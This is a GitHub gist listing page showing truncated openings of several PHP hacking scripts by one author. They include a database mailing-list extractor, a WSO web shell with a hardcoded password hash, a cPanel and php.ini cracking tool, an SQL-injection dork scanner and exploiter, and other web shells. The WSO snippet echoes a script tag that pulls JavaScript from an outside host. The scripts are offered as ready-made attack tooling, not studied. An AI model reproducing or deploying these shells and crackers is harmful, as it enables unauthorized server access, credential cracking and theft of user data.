Skip to content

Instantly share code, notes, and snippets.

@MesterFri
MesterFri / ZeGbOx.php
Created December 7, 2017 02:25
ZeGbOx Y3.0a Script Extract maillist in Databases Developed By MesterFri
<?php
error_reporting(0);
session_start();
ob_start();
function MnIndx($xClass) {
if (!empty($_SESSION['ZeGbOx_mOde'])) {
switch ($_SESSION['ZeGbOx_mOde']) {
case 'ZeDef_Fri':
@MesterFri
MesterFri / EvOxFri.php
Created June 10, 2017 16:09
Script Fuck Security Coded BY MesterFri
<?php
echo '<style type="text/css">
.xButaFri{
background-color: #000;
font-size: 30px;
border: 1px #FF0000 solid;
border-radius: 2px;
@MesterFri
MesterFri / wso.php
Created September 18, 2016 14:45
Script WSO 2016 + Password inurl:wso.php
<?php
$▛ = "63a9f0ea7bb98050796b649e85481845"; //root
$▘ = true;
$▜ = 'UTF-8';
$▚ = 'FilesMan';
$▙ = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
prototype(md5($_SERVER['HTTP_HOST'])."key", $▙);
}
echo "<SCRIPT SRC=http://w0rms.com/sayac.js></SCRIPT>";
@MesterFri
MesterFri / MuSLim.php
Created September 5, 2016 17:23
Script MuSLim : Crack php.ini and All User and Auto Crack Cpanel Coded by MesterFri
<?php
$head = '
<html>
<head>
</script>
<title>MuSLim - by MesterFri</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
@MesterFri
MesterFri / Scan_Shell.php
Created August 5, 2016 11:30
The Script Scan Shell "Scan all fille"
<?php
error_reporting (E_ALL);
ini_set("memory_limit","2000M");
ini_set("safe_mode","off");
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode)
set_time_limit(0);
if (@!isset($_POST['key']))
{
?>
@MesterFri
MesterFri / SQLi.php
Last active July 12, 2016 05:24
Script Scanner dork SQLi >> Exploit by MesterFri
<!--
##############
# MesterFri #
##############
//-->
<?php
set_time_limit(0);
@MesterFri
MesterFri / Fri.php
Last active July 11, 2016 20:45
Fresh Shell 2016 Name : MesterFri file creat by MesterFri
<?php
set_time_limit(0);
error_reporting(0);
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}